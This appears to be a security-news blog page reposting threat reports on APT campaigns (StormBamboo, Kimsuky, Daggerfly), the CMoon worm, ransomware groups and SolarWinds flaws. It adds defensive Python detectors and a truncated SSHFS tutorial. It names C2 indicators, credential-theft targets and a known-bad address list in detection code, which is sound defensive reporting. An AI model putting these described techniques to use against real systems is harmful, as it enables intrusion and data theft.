“The remote control malware (DoraRAT) used in the attack was simple and lightweight, focusing on basic functions like file upload/download and command execution. It was distributed using a watering hole technique, which increased its exposure. Unlike more sophisticated APT malware, DoraRAT had minimal functionality. Additionally, a file-stealing variant was identified, capable of exfiltrating large files related to machinery and equipment design.” continues the joint advisory. “Andariel also exploited vulnerabilities in server security products, demonstrating a trend of targeting IT management software for mass infections due to their high-level access and control.”

Below are the mitigations provided by the South Korean authorities:

  • Organizations managing websites in sectors like construction and machinery should seek security assessments from relevant institutions if needed.
  • Ongoing security training for all organizational members, including IT and security staff, is crucial.
  • Keep operating systems and applications up-to-date, and use updated antivirus software with real-time detection.
  • Implement strict approval policies for software distribution to prevent vulnerabilities in automated deployment.
  • Stay informed about government cybersecurity advisories and act promptly on manufacturer recommendations.
  • Refer to guidelines for software supply chain security and software development security provided by national authorities.

Chinese StormBamboo APT compromised ISP to deliver malware

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

A China-linked APT, tracked as StormBamboo, compromised an internet service provider (ISP) to poison software update mechanisms with malware.

Volexity researchers reported that a China-linked APT group, tracked as StormBamboo (aka Evasive Panda, Daggerfly, and StormCloud), successfully compromised an undisclosed internet service provider (ISP) in order to poison DNS responses for target organizations.

The threat actors targeted insecure software update mechanisms to install malware on macOS and Windows victim machines.

In mid-2023, Volexity discovered multiple malware infections affecting macOS and Windows systems within victim organizations. The company linked the attacks to the StormBamboo APT group. Upon investigating the incidents, the researchers determined that a DNS poisoning attack at the ISP level caused the infections. The attackers altered DNS responses for domains related to software updates to deploy multiple malware families, including MACMA and POCOSTICK (MGBot). The attacker’s methods resemble those of DriftingBamboo, suggesting a possible connection between the two threat actors.

Daggerfly has been active for at least a decade, and the group is known for its use of the custom MgBot malware framework. In 2023, Symantec identified a Daggerfly intrusion at an African telecom operator that used new MgBot plugins. This highlights the group’s ongoing evolution in cyber espionage tactics.

The Macma macOS backdoor was first detailed by Google in 2021 and has been used since at least 2019. At the time of discovery, threat actors employed the malware in watering hole attacks involving compromised websites in Hong Kong. The watering hole attacks used exploits for iOS and macOS devices. Attackers exploited the privilege escalation vulnerability CVE-2021-30869 to install Macma on macOS devices.

Macma is a modular backdoor that supports multiple functionalities, including device fingerprinting, executing commands, screen capture, keylogging, audio capture, uploading and downloading files.

Although Macma was widely used in cyber operations carried out by nation-state actors, it was not linked to a particular group.

“During one incident investigated by Volexity, it was discovered that StormBamboo poisoned DNS requests to deploy malware via an HTTP automatic update mechanism and poison responses for legitimate hostnames that were used as second-stage, command-and-control (C2) servers.” reads the report published by Volexity. “The DNS records were poisoned to resolve to an attacker-controlled server in Hong Kong at IP address 103.96.130[.]107. Initially, Volexity suspected the initial victim organization’s firewall may have been compromised. However, further investigation revealed the DNS poisoning was not performed within the target infrastructure, but further upstream at the ISP level.”

Volexity promptly alerted the ISP, which then investigated key traffic-routing devices on its network. After rebooting and taking parts of the network offline, the DNS poisoning stopped. The researchers were not able to identify a specific compromised device; however, updating or deactivating various infrastructure components effectively ended the malicious activity.

“The logic behind the abuse of automatic updates is the same for all the applications: the legitimate application performs an HTTP request to retrieve a text-based file (the format varies) containing the latest application version and a link to the installer.” continues the report. “Since the attacker has control of the DNS responses for any given DNS name, they abuse this design, redirecting the HTTP request to a C2 server they control hosting a forged text file and a malicious installer. The AiTM workflow is shown below.”


StormBamboo targeted various software vendors with insecure update mechanisms, using complex methods to deploy malware. For example, they targeted 5KPlayer’s update process for the “youtube-dl” dependency to deliver a backdoored installer from their C2 servers. Once systems were compromised, the attackers installed a malicious Google Chrome extension called ReloadText to steal browser cookies and email data.

“The incident described in this blog post confirms the supposition made by ESET concerning the infection vector for the POCOSTICK malware. The attacker can intercept DNS requests and poison them with malicious IP addresses, and then use this technique to abuse automatic update mechanisms that use HTTP rather than HTTPS.” concludes the report. “This method is similar to the attack vector Volexity previously observed being used by DriftingBamboo following the 0-day exploitation of Sophos Firewalls.”
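The kind of resolver-log check that would surface the ISP-level poisoning described above, as an added example that is not part of Volexity's report: answers for monitored update hostnames are compared against an expected netblock and against known-bad addresses, and hits are grouped to show how many distinct clients received the same bad answer. The log format, hostnames and baseline netblocks are constructed for illustration; only the 103.96.130[.]107 address comes from the report.

```python
"""Detect off-baseline DNS answers for software-update hostnames (added example)."""
import ipaddress
import re
from collections import defaultdict

# Constructed resolver log lines: "<ts> client=<ip> q=<name> a=<ip> ttl=<n>".
SAMPLE_LOG = """\
2023-06-01T10:00:01Z client=10.0.0.5 q=updates.example-player.test a=203.0.113.10 ttl=300
2023-06-01T10:00:02Z client=10.0.0.7 q=cdn.example-media.test a=198.51.100.22 ttl=300
2023-06-01T10:05:01Z client=10.0.0.5 q=updates.example-player.test a=103.96.130.107 ttl=60
2023-06-01T10:05:03Z client=10.0.0.9 q=updates.example-player.test a=103.96.130.107 ttl=60
2023-06-01T10:05:04Z client=10.0.0.7 q=updates.example-player.test a=103.96.130.107 ttl=60
2023-06-01T10:06:00Z client=10.0.0.7 q=www.example-news.test a=192.0.2.8 ttl=3600
"""

# Assumed baseline pinned by the defender: netblocks each update hostname should resolve into.
BASELINE = {
    "updates.example-player.test": [ipaddress.ip_network("203.0.113.0/24")],
    "cdn.example-media.test": [ipaddress.ip_network("198.51.100.0/24")],
}

# Known-bad answer addresses from threat intelligence; this one is the reported C2.
KNOWN_BAD = {ipaddress.ip_address("103.96.130.107")}

LINE_RE = re.compile(r"^(\S+) client=(\S+) q=(\S+) a=(\S+) ttl=(\d+)$")


def parse_line(line):
    """Parse one constructed log line into a record, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, name, answer, ttl = m.groups()
    return {
        "ts": ts,
        "client": ipaddress.ip_address(client),
        "name": name.lower(),
        "answer": ipaddress.ip_address(answer),
        "ttl": int(ttl),
    }


def classify(rec):
    """Return the list of reasons this answer is suspicious (empty when it is not)."""
    reasons = []
    if rec["answer"] in KNOWN_BAD:
        reasons.append("known-bad answer")
    nets = BASELINE.get(rec["name"])
    if nets is not None and not any(rec["answer"] in n for n in nets):
        reasons.append("answer outside baseline")
    return reasons


def scan(log_text):
    """Run every line through the classifier and collect the alerts."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            alerts.append({**rec, "reasons": reasons})
    return alerts


def poisoning_scope(alerts):
    """Count distinct clients per (name, answer): many clients sharing one bad answer
    points upstream (resolver or ISP), not at a single compromised host."""
    clients = defaultdict(set)
    for a in alerts:
        clients[(a["name"], str(a["answer"]))].add(str(a["client"]))
    return {k: len(v) for k, v in clients.items()}


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for a in hits:
        print(a["ts"], a["client"], a["name"], "->", a["answer"], a["reasons"])
    print(poisoning_scope(hits))
```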


North Korea Kimsuky Launch Phishing Attacks on Universities

Posted on August 8, 2024 - August 8, 2024 by Maq Verma

Cybersecurity analysts have uncovered critical details about the North Korean advanced persistent threat (APT) group Kimsuky, which has been targeting universities as part of its global espionage operations. 

Kimsuky, active since at least 2012, primarily targets South Korean think tanks and government entities, though its reach extends to the US, the UK and other European nations. The group specializes in sophisticated phishing campaigns, often posing as academics or journalists to infiltrate networks and steal sensitive information.

Recent Findings and Tactics

According to a new advisory published by Resilience today, its analysts capitalized on Kimsuky’s operational security mistakes, which led to the collection of source code, login credentials and other crucial data. 

The data revealed that Kimsuky has been phishing university staff, researchers and professors, aiming to access and exfiltrate valuable research and intelligence. Once inside university networks, the group was observed stealing information critical for North Korea, particularly given the country’s limited scientific community.

The group’s actions align with the objectives of the Reconnaissance General Bureau (RGB), North Korea’s primary foreign intelligence agency. 

Historically, Kimsuky has been linked to attempts to steal sensitive data, including nuclear research, healthcare innovations and pharmaceutical secrets. There is also evidence suggesting that Kimsuky engages in financially motivated cybercrime, potentially as a means to fund its espionage activities.

Resilience’s new findings shed light on Kimsuky’s methods, particularly its use of phishing pages that mimic legitimate university login portals. By altering the code of these pages, Kimsuky can capture the credentials of unsuspecting victims. Notably, the group has targeted institutions such as Dongduk University, Korea University and Yonsei University.

The operation also highlighted Kimsuky’s use of a custom tool called “SendMail,” which was deployed to send phishing emails using compromised email accounts. These emails were carefully crafted to deceive recipients into providing their login information, furthering Kimsuky’s espionage efforts. 

According to Resilience, the breadth and depth of Kimsuky’s tactics underscore the persistent and evolving threat posed by state-backed cyber groups. 

Recommendations for Organizations

To tackle this threat, the security firm recommended leveraging phish-resistant multifactor authentication (MFA), such as FIDO-compliant hardware tokens or push-based mobile applications. 

Additionally, users should always double-check that the URL they are logging into matches the page they expect to be on, as some password managers can assist with this automatically. 

Finally, organizations are encouraged to review and test Breach and Attack Simulation packages that simulate Kimsuky activity to better prepare for potential attacks.


New CMoon USB worm targets Russians in data theft attacks

Posted on August 8, 2024 - August 8, 2024 by Maq Verma

A new self-spreading worm named ‘CMoon,’ capable of stealing account credentials and other data, has been distributed in Russia since early July 2024 via a compromised gas supply company website.

According to Kaspersky researchers who discovered the campaign, CMoon can perform a broad range of functions, including loading additional payloads, snapping screenshots, and launching distributed denial of service (DDoS) attacks.

Judging from the distribution channel the threat actors used, their targeting scope is focused on high-value targets rather than random internet users, which indicates a sophisticated operation. 

Distribution mechanism

Kaspersky says the infection chain begins when users click on links to regulatory documents (.docx, .xlsx, .rtf, and .pdf) found on various pages of a company’s website that provides gasification and gas supply services to a Russian city.

The threat actors replaced the document links with links to malicious executables, which were also hosted on the site and delivered to the victims as self-extracting archives containing the original document and the CMoon payload, named after the original link.

“We have not seen other vectors of distribution of this malware, so we believe that the attack is aimed only at visitors to the particular site,” reports Kaspersky.

After the gas firm was notified of this compromise, the malicious files and links were removed from its website on July 25, 2024.

However, due to CMoon’s self-propagation mechanisms, its distribution may continue autonomously.

CMoon is a .NET worm that copies itself to a newly created folder named after the antivirus software it detected on the compromised device or one resembling a system folder if no AVs are detected.

The worm creates a shortcut on the Windows Startup directory to ensure it runs on system startup, securing persistence between reboots.

To avoid raising suspicions during manual user checks, it alters its files’ creation and modification dates to May 22, 2013.

The worm monitors for newly connected USB drives, and when any are hooked up on the infected machine, it replaces all files except for ‘LNKs’ and ‘EXEs’ with shortcuts to its executable.

CMoon also looks for interesting files stored on the USB drives and temporarily stores them in hidden directories (‘.intelligence’ and ‘.usb’) before these are exfiltrated to the attacker’s server.

CMoon features standard info-stealer functionality, targeting cryptocurrency wallets, data stored in web browsers, messenger apps, FTP and SSH clients, and document files in the USB or user folders that contain the text strings ‘secret,’ ‘service,’ or ‘password.’

An interesting and somewhat unusual feature is the targeting of files that might contain account credentials such as .pfx, .p12, .kdb, .kdbx, .lastpass, .psafe3, .pem, .key, .private, .asc, .gpg, .ovpn, and .log files.

[Figure: Targeted directories and data (Source: Kaspersky)]
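A triage scan for the drive-level artifacts described above, as an added example rather than Kaspersky's code: it walks a mounted drive and flags the hidden ‘.intelligence’/‘.usb’ staging folders, files whose modification date was stomped to May 22, 2013, and folders where every document has been replaced by shortcuts. The sample drive is a constructed temporary directory tree; the file names in it are made up.

```python
"""Scan a drive for CMoon-style artifacts (added example, constructed sample tree)."""
import os
import tempfile
from datetime import datetime, timezone

STOMPED_DATE = (2013, 5, 22)              # date CMoon writes into file timestamps
STAGING_DIRS = {".intelligence", ".usb"}  # hidden folders used to stage files for exfil
KEPT_EXTS = {".lnk", ".exe"}              # the only extensions the worm leaves in place


def has_stomped_timestamp(path):
    """True when the file's modification date (in UTC) is exactly 2013-05-22."""
    mtime = datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)
    return (mtime.year, mtime.month, mtime.day) == STOMPED_DATE


def scan_drive(root):
    """Walk a mounted drive and return (finding, path) pairs for CMoon-like artifacts."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d in STAGING_DIRS:
                findings.append(("staging-dir", os.path.join(dirpath, d)))
        exts = [os.path.splitext(f)[1].lower() for f in filenames]
        lnk_count = exts.count(".lnk")
        others = [e for e in exts if e not in KEPT_EXTS]
        # A folder holding only shortcuts and executables, with no documents left,
        # matches the "replace everything except LNKs and EXEs" behaviour.
        if lnk_count >= 2 and not others:
            findings.append(("lnk-swap", dirpath))
        for f in filenames:
            full = os.path.join(dirpath, f)
            if has_stomped_timestamp(full):
                findings.append(("timestomped", full))
    return findings


def build_sample_drive():
    """Construct a throwaway directory tree that mimics an infected USB stick."""
    root = tempfile.mkdtemp(prefix="cmoon-demo-")
    stomped = datetime(2013, 5, 22, 12, 0, tzinfo=timezone.utc).timestamp()
    # Root of the stick: documents already swapped for shortcuts, plus the dropped EXE.
    for name in ("Report.lnk", "Invoice.lnk", "Photos.lnk", "Update.exe"):
        p = os.path.join(root, name)
        with open(p, "wb") as fh:
            fh.write(b"placeholder")
        os.utime(p, (stomped, stomped))
    # Hidden staging folders holding copies of the originals, with real timestamps.
    for d, name in ((".usb", "Report.docx"), (".intelligence", "passwords.txt")):
        os.makedirs(os.path.join(root, d))
        with open(os.path.join(root, d, name), "wb") as fh:
            fh.write(b"placeholder")
    return root


def summarize(findings):
    """Count findings per kind, e.g. {'staging-dir': 2, 'lnk-swap': 1, 'timestomped': 4}."""
    counts = {}
    for kind, _ in findings:
        counts[kind] = counts.get(kind, 0) + 1
    return counts


if __name__ == "__main__":
    for kind, path in scan_drive(build_sample_drive()):
        print(f"{kind:12} {path}")
```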

The malware can also download and execute additional payloads, capture screenshots of the breached device, and initiate DDoS attacks on specified targets.

Stolen files and system information are packaged and sent to an external server, where they are decrypted (RC4) and verified for their integrity using an MD5 hash.

[Figure: Generating the data package for exfiltration (Source: Kaspersky)]

Kaspersky leaves open the possibility of more sites outside its current visibility distributing CMoon, so vigilance is advised.

No matter how targeted this campaign may be, the fact that the worm spreads autonomously means it could reach unintended systems and create the conditions for opportunistic attacks.


FBI: BlackSuit ransomware made over $500 million in ransom demands

Posted on August 8, 2024 - August 8, 2024 by Maq Verma

CISA and the FBI confirmed today that the Royal ransomware rebranded to BlackSuit and has demanded over $500 million from victims since it emerged more than two years ago.

This new information was shared as an update to a joint advisory published in March 2023, which says the BlackSuit gang has been active since September 2022.

However, this private group is believed to be a direct successor of the notorious Conti cybercrime syndicate and started as Quantum ransomware in January 2022.

While they initially used other gangs’ encryptors (like ALPHV/BlackCat), likely to avoid drawing unwanted attention, they deployed their own Zeon encryptor soon after and rebranded to Royal in September 2022.

After attacking the City of Dallas, Texas, in June 2023, the Royal ransomware operation began testing a new encryptor called BlackSuit amid rebranding rumors. Since then, they have been operating under the BlackSuit name, and Royal Ransomware attacks have stopped altogether.

“BlackSuit ransomware is the evolution of the ransomware previously identified as Royal ransomware, which was used from approximately September 2022 through June 2023. BlackSuit shares numerous coding similarities with Royal ransomware and has exhibited improved capabilities,” the FBI and CISA confirmed in a Wednesday update to their original advisory.

“Ransom demands have typically ranged from approximately $1 million to $10 million USD, with payment demanded in Bitcoin. BlackSuit actors have demanded over $500 million USD in total and the largest individual ransom demand was $60 million.”

In March 2023 and a subsequent November 2023 advisory update, the two agencies shared indicators of compromise and a list of tactics, techniques, and procedures (TTPs) to help defenders block the gang’s attempts to deploy ransomware on their networks.

CISA and the FBI also linked the BlackSuit gang to attacks against over 350 organizations since September 2022 and at least $275 million in ransom demands.

The joint advisory was first issued after the Department of Health and Human Services (HHS) security team revealed in December 2022 that the ransomware operation was behind multiple attacks targeting healthcare organizations across the United States.

Most recently, multiple sources told BleepingComputer that the BlackSuit ransomware gang was behind a massive CDK Global IT outage that disrupted operations at over 15,000 car dealerships across North America.

This widespread outage after last month’s attack forced CDK to shut down its IT systems and data centers to contain the incident and car dealerships to switch to pen and paper, making it impossible for buyers to purchase cars or receive service for already-bought vehicles.


McLaren hospitals disruption linked to INC ransomware attack

Posted on August 8, 2024 - August 8, 2024 by Maq Verma

On Tuesday, IT and phone systems at McLaren Health Care hospitals were disrupted following an attack linked to the INC Ransom ransomware operation.

McLaren is a non-profit healthcare system with annual revenues of over $6.5 billion, which operates a network of 13 hospitals across Michigan supported by a team of 640 physicians. It also has over 28,000 employees and works with 113,000 network providers throughout Michigan, Indiana, and Ohio.

“While McLaren Health Care continues to investigate a disruption to our information technology system, we want to ensure our teams are as prepared as possible to care for patients when they arrive,” a statement on the health system’s website reads.

“Patients with scheduled appointments should plan to attend those appointments unless they are contacted by a member of our care team.”

McLaren hinted the hospitals had lost access to patient information databases when advising patients to bring detailed information about their current medications to appointments, including physician orders and printed results of recent lab tests. The health system also said it may have to reschedule some appointments and non-emergent or elective procedures “out of an abundance of caution.”

“We understand this situation may be frustrating to our patients – and to our team members – and we deeply and sincerely apologize for any inconvenience this may cause,” McLaren added. “We kindly ask for your patience while our caregivers and support teams work as diligently as ever to provide our communities the care they need and deserve.”

Even though McLaren has yet to disclose the nature of the incident, employees at McLaren Bay Region Hospital in Bay City have shared a ransom note warning that the hospital’s systems have been encrypted and stolen data will be published on INC RANSOM ransomware gang’s leak site if a ransom is not paid.

[Figure: Alleged McLaren ransom note (Thomas Barz)]

INC Ransom is a ransomware-as-a-service (RaaS) operation that surfaced in July 2023 and has since targeted organizations in both the public and private sectors.

The list of victims includes education, healthcare, government, and industrial entities like Yamaha Motor Philippines, the U.S. division of Xerox Business Solutions (XBS), and Scotland’s National Health Service (NHS).

In May, a threat actor known as “salfetka” claimed to be selling source code of INC Ransom’s Windows and Linux/ESXi encrypter versions for $300,000 on the Exploit and XSS hacking forums.

Two months later, in July, malware analysts stated that the source code might have been purchased by a newly emerged ransomware group called Lynx ransomware. However, this could also be a rebranding effort, potentially allowing INC RANSOM to continue operations with less scrutiny from law enforcement.

BleepingComputer compared the strings in the new Lynx ransomware encryptors with those in recent INC encryptors and can confirm that, apart from small changes, they are mostly the same.

[Figure: INC vs. Lynx ransomware string comparison (BleepingComputer)]

In November 2023, McLaren notified almost 2.2 million people of a data breach that exposed their personal and health information between late July and August 2023.

Compromised data included names, Social Security numbers, health insurance and physician information, as well as Medicare/Medicaid, prescription/medication, and diagnostic results and treatment information.

The ALPHV/BlackCat ransomware group claimed the July 2023 attack behind the data breach on October 4.


SolarWinds Patches 8 Critical Flaws in Access Rights Manager Software

Posted on August 4, 2024 - August 4, 2024 by Maq Verma

SolarWinds has addressed a set of critical security flaws impacting its Access Rights Manager (ARM) software that could be exploited to access sensitive information or execute arbitrary code.

Of the 13 vulnerabilities, eight are rated Critical in severity and carry a CVSS score of 9.6 out of 10.0. The remaining five weaknesses have been rated High in severity, with four of them having a CVSS score of 7.6 and one scoring 8.3.

The most severe of the flaws are listed below –

  • CVE-2024-23472 – SolarWinds ARM Directory Traversal Arbitrary File Deletion and Information Disclosure Vulnerability
  • CVE-2024-28074 – SolarWinds ARM Internal Deserialization Remote Code Execution Vulnerability
  • CVE-2024-23469 – Solarwinds ARM Exposed Dangerous Method Remote Code Execution Vulnerability
  • CVE-2024-23475 – Solarwinds ARM Traversal and Information Disclosure Vulnerability
  • CVE-2024-23467 – Solarwinds ARM Traversal Remote Code Execution Vulnerability
  • CVE-2024-23466 – Solarwinds ARM Directory Traversal Remote Code Execution Vulnerability
  • CVE-2024-23470 – Solarwinds ARM UserScriptHumster Exposed Dangerous Method Remote Command Execution Vulnerability
  • CVE-2024-23471 – Solarwinds ARM CreateFile Directory Traversal Remote Code Execution Vulnerability

Successful exploitation of the aforementioned vulnerabilities could allow an attacker to read and delete files and execute code with elevated privileges.

The shortcomings have been addressed in version 2024.3 released on July 17, 2024, following responsible disclosure as part of the Trend Micro Zero Day Initiative (ZDI).

The development comes after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a high-severity path traversal flaw in SolarWinds Serv-U Path (CVE-2024-28995, CVSS score: 8.6) to its Known Exploited Vulnerabilities (KEV) catalog following reports of active exploitation in the wild.

The network security company was the victim of a major supply chain attack in 2020 after the update mechanism associated with its Orion network management platform was compromised by Russian APT29 hackers to distribute malicious code to downstream customers as part of a high-profile cyber espionage campaign.

The breach prompted the U.S. Securities and Exchange Commission (SEC) to file a lawsuit against SolarWinds and its chief information security officer (CISO) last October alleging the company failed to disclose adequate material information to investors regarding cybersecurity risks.

However, many of the claims in the lawsuit were thrown out by the U.S. District Court for the Southern District of New York (SDNY) on July 18, which stated that “these do not plausibly plead actionable deficiencies in the company’s reporting of the cybersecurity hack” and that they “impermissibly rely on hindsight and speculation.”


SocGholish Malware Exploits BOINC Project for Covert Cyberattacks

Posted on August 4, 2024 - August 4, 2024 by Maq Verma

The JavaScript downloader malware known as SocGholish (aka FakeUpdates) is being used to deliver a remote access trojan called AsyncRAT as well as a legitimate open-source project called BOINC.

BOINC, short for Berkeley Open Infrastructure Network Computing Client, is an open-source “volunteer computing” platform maintained by the University of California with an aim to carry out “large-scale distributed high-throughput computing” using participating home computers on which the app is installed.

“It’s similar to a cryptocurrency miner in that way (using computer resources to do work), and it’s actually designed to reward users with a specific type of cryptocurrency called Gridcoin, designed for this purpose,” Huntress researchers Matt Anderson, Alden Schmidt, and Greg Linares said in a report published last week.

These malicious installations are designed to connect to an actor-controlled domain (“rosettahome[.]cn” or “rosettahome[.]top”), essentially acting as a command-and-control (C2) server to collect host data, transmit payloads, and push further commands. As of July 15, 10,032 clients are connected to the two domains.

The cybersecurity firm said while it hasn’t observed any follow-on activity or tasks being executed by the infected hosts, it hypothesized that the “host connections could be sold off as initial access vectors to be used by other actors and potentially used to execute ransomware.”

SocGholish attack sequences typically begin when users land on compromised websites, where they are prompted to download a fake browser update that, upon execution, triggers the retrieval of additional payloads to the infiltrated machines.

The JavaScript downloader, in this case, activates two disjointed chains, one that leads to the deployment of a fileless variant of AsyncRAT and the other resulting in the BOINC installation.


The BOINC app, which is renamed as “SecurityHealthService.exe” or “trustedinstaller.exe” to evade detection, sets up persistence using a scheduled task by means of a PowerShell script.
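One way to audit scheduled-task actions for the masquerading described above, written as an added example and not taken from the Huntress report: each task's program path is checked against where Windows itself keeps a binary of that name, and against user-writable locations where a system service would never live. The task entries are constructed (in the shape of name plus “Task To Run” as `schtasks /query /v /fo CSV` exports them), and the expected-home directories are an assumed baseline.

```python
"""Flag scheduled tasks whose action borrows a Windows system binary name (added example)."""
import ntpath

# Assumed baseline: where Windows keeps the binaries whose names the renamed
# BOINC client borrows (SecurityHealthService.exe, trustedinstaller.exe).
EXPECTED_HOME = {
    "securityhealthservice.exe": r"c:\windows\system32",
    "trustedinstaller.exe": r"c:\windows\servicing",
}

# Directory markers an ordinary user can write to; system services do not run from here.
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")


def executable_from_command(command):
    """Return the program path from a task action string, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def check_task(task_name, command):
    """Return the reasons a task action looks like a masquerade (empty if none)."""
    exe = executable_from_command(command)
    base = ntpath.basename(exe).lower()
    folder = ntpath.dirname(exe).lower().rstrip("\\")
    reasons = []
    home = EXPECTED_HOME.get(base)
    if home is not None and folder != home:
        reasons.append(f"{base} runs from {folder}, expected {home}")
    if any(marker in folder + "\\" for marker in USER_WRITABLE):
        reasons.append("action lives in a user-writable directory")
    return reasons


def audit_tasks(tasks):
    """tasks: iterable of (task_name, action_command). Returns {task_name: reasons} for hits."""
    hits = {}
    for name, command in tasks:
        reasons = check_task(name, command)
        if reasons:
            hits[name] = reasons
    return hits


# Constructed task list; none of these are real observed tasks.
SAMPLE_TASKS = [
    (r"\Microsoft\Windows\Defender\Health",
     r'"C:\Windows\System32\SecurityHealthService.exe"'),
    (r"\SecurityHealthService",
     r'"C:\Users\bob\AppData\Roaming\shs\SecurityHealthService.exe"'),
    (r"\TrustedInstaller",
     r"C:\ProgramData\ti\trustedinstaller.exe"),
    (r"\Maintenance\Cleanup",
     r"C:\Windows\System32\cleanmgr.exe /autoclean"),
]


if __name__ == "__main__":
    for name, reasons in audit_tasks(SAMPLE_TASKS).items():
        print(name)
        for r in reasons:
            print("   -", r)
```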

The misuse of BOINC for malicious purposes hasn’t gone unnoticed by the project maintainers, who are currently investigating the problem and finding a way to “defeat this malware.” Evidence of the abuse dates back to at least June 26, 2024.

“The motivation and intent of the threat actor by loading this software onto infected hosts isn’t clear at this point,” the researchers said.

“Infected clients actively connecting to malicious BOINC servers present a fairly high risk, as there’s potential for a motivated threat actor to misuse this connection and execute any number of malicious commands or software on the host to further escalate privileges or move laterally through a network and compromise an entire domain.”

The development comes as Check Point said it’s been tracking the use of compiled V8 JavaScript by malware authors to sidestep static detections and conceal remote access trojans, stealers, loaders, cryptocurrency miners, wipers, and ransomware.

“In the ongoing battle between security experts and threat actors, malware developers keep coming up with new tricks to hide their attacks,” security researcher Moshe Marelus said. “It’s not surprising that they’ve started using V8, as this technology is commonly used to create software as it is very widespread and extremely hard to analyze.”


Chinese Hackers Target Taiwan and U.S. NGO with MgBot and MACMA Malware

Posted on August 4, 2024 - August 4, 2024 by Maq Verma

Organizations in Taiwan and a U.S. non-governmental organization (NGO) based in China have been targeted by a Beijing-affiliated state-sponsored hacking group called Daggerfly using an upgraded set of malware tools.

The campaign is a sign that the group “also engages in internal espionage,” Symantec’s Threat Hunter Team, part of Broadcom, said in a new report published today. “In the attack on this organization, the attackers exploited a vulnerability in an Apache HTTP server to deliver their MgBot malware.”

Daggerfly, also known by the names Bronze Highland and Evasive Panda, was previously observed using the MgBot modular malware framework in connection with an intelligence-gathering mission aimed at telecom service providers in Africa. It has been operational since 2012.

“Daggerfly appears to be capable of responding to exposure by quickly updating its toolset to continue its espionage activities with minimal disruption,” the company noted.

The latest set of attacks is characterized by the use of a new malware family based on MgBot as well as an improved version of a known Apple macOS malware called MACMA, which was first exposed by Google’s Threat Analysis Group (TAG) in November 2021 as being distributed via watering hole attacks targeting internet users in Hong Kong by abusing security flaws in the Safari browser.

The development marks the first time the malware strain, which is capable of harvesting sensitive information and executing arbitrary commands, has been explicitly linked to a particular hacking group.

“The actors behind macOS.MACMA at least were reusing code from ELF/Android developers and possibly could have also been targeting Android phones with malware as well,” SentinelOne noted in a subsequent analysis at the time.

MACMA’s connections to Daggerfly also stem from source code overlaps between the malware and MgBot, and the fact that it connects to a command-and-control (C2) server (103.243.212[.]98) that has also been used by a MgBot dropper.

Another new malware in its arsenal is Nightdoor (aka NetMM and Suzafk), an implant that uses Google Drive API for C2 and has been utilized in watering hole attacks aimed at Tibetan users since at least September 2023. Details of the activity were first documented by ESET earlier this March.

“The group can create versions of its tools targeting most major operating system platforms,” Symantec said, adding it has “seen evidence of the ability to trojanize Android APKs, SMS interception tools, DNS request interception tools, and even malware families targeting Solaris OS.”

The development comes as China’s National Computer Virus Emergency Response Center (CVERC) claimed Volt Typhoon – which has been attributed by the Five Eyes nations as a China-nexus espionage group – to be an invention of the U.S. intelligence agencies, describing it as a misinformation campaign.

“Although its main targets are U.S. congress and American people, it also attempt[s] to defame China, sow discords [sic] between China and other countries, contain China’s development, and rob Chinese companies,” the CVERC asserted in a recent report.

Posted in Vulnerability. Tagged: Cyber Attacks, Data Security, malware, vulnerability.

Linux: Mount Remote Directories With SSHFS

Posted on August 4, 2024 - August 4, 2024 by Maq Verma

The Secure Shell (SSH) isn’t just about allowing you to remote into servers to tackle admin tasks. Thanks to this secure networking protocol, you can also mount remote directories with the help of the SSH File System (SSHFS).

SSHFS uses SFTP (SSH File Transfer Protocol) to mount remote directories on a local machine over an encrypted connection, which means the connection is far more secure than standard FTP. Once a remote directory is mounted, it can be used as if it were on the local machine.

Consider SSHFS a more secure way of creating network shares. The one difference is that SSHFS must be installed on every machine that needs to connect to the share (whereas with Samba, it only needs to be installed on the machine hosting the share).

Let’s walk through the process of getting SSHFS up and running, so you can securely mount remote directories to your local machine.

What You’ll Need

To make this work, you’ll need at least two Linux machines. These machines can be Ubuntu or Fedora-based, because SSHFS is found in the standard repositories for most Linux distributions. You’ll also need a user with sudo privileges.

Installing SSHFS

Since SSHFS is found in the standard repositories, the installation is quite simple. Log into the server (which will house the directory to share) and install SSHFS with one of the following commands:

  • Ubuntu-based distributions – sudo apt-get install sshfs -y
  • Fedora-based distributions – sudo dnf install fuse-sshfs -y
  • Arch-based distributions – sudo pacman -S sshfs
  • openSUSE-based distributions – sudo zypper -n in sshfs

Next, log into your local machine and install the package as well.

Once installed, you’ll need to set user_allow_other in the FUSE config file on the local machine. For that, open the file with:

sudo nano /etc/fuse.conf


In that file, locate the line:

#user_allow_other


Change that to:

user_allow_other


Save and close the file.

Creating a Directory for Mounting

Back on the server, we must create a directory that will be mounted on the client machines. We’ll place our new directory in /srv with the command:

sudo mkdir /srv/data


With the new directory created, we need to set its ownership so that either a user or a group can access it. If only one user needs access, change the ownership with the command:

sudo chown -R USERNAME:USERNAME /srv/data


If you want to allow more than one user to access the directory, you’d need to first create a group with the command:

sudo groupadd GROUP


Where GROUP is the name of the new group.

Next, add the necessary users to the group (one at a time) with the command:

sudo usermod -aG GROUP USERNAME


Where GROUP is the name of the group and USERNAME is the name of the user to be added.

You would then need to change the ownership of the new directory to the new group with:

sudo chown -R USERNAME:GROUP /srv/data


On the local machine, you’ll have to create a directory that will house the mounted remote directory. We’ll create this in a user’s home directory with:

mkdir ~/data_mount

Mount the Directory

It’s now time to mount our remote directory. Remember, we’re mounting the remote directory /srv/data to the local directory ~/data_mount. This is done with the command:

sshfs USER@SERVER:/srv/data ~/data_mount


Where USER is the remote username and SERVER is the IP address of the remote server. You’ll be prompted for the remote user’s password. On successful authentication, the remote directory will be mounted to the local directory and you can access it as if it were native to the local machine. If you save or edit a file in ~/data_mount, it will be reflected in /srv/data on the remote machine.

This method of mounting is temporary. Let’s make it permanent.

Permanently Mount the Remote Drive

